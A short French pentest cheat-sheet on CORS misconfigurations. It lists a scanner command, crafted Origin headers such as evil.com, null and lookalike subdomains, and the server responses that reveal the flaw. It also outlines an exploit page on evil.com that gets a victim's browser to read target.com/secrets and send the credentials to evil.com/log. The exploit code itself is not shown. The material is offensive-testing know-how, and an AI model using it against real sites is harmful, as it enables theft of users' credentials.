CORS
Cross-Origin Ressource Sharing
Dernière mise à jour
Cet article vous a-t-il été utile ?
Cross-Origin Ressource Sharing
Dernière mise à jour
Cet article vous a-t-il été utile ?
CORScanner est un scanner de faille CORS (Cross Origin Resource Sharing).
Exemple d'utilisation:
$ python cors-scanner.py -u https://target.com/
ressource:
Header Requête:
Origin: http://evil.com
Regarder dans la réponse si l'url est acceptée.
Header Réponse:
Access-Control-Allow-Origin: http://evil.com
Header requête:
Origin: null
Regarder si une origine "null" est acceptée.
Header réponse:
Access-Control-Allow-Origin: null
Header requête:
Origin: sub.target.com.evil.com
Header réponse:
Access-Control-Allow-Origin: sub.target.com.evil.com
Header requête:
Origin: eviltarget.com
Origin: evil-target.com
Header réponse:
Access-Control-Allow-Origin: eviltarget.com ou evil-target.com
Création d'un exploit pour voler les identifiants d'un utilisateur stocké dans http://target.com/secrets.
Contenu de la page http://evil.com/exploit:
On envoie ensuite le lien (http://evil.com/exploit) à l'utilisateur qui si il clique dessus vas permettre de le forcer à se rendre sur https://target.com/secrets et récupérer ses identifiants pour les afficher dans les logs de evil.com (http://evil.com/log?key=<données de la page https://target.com/secrets>).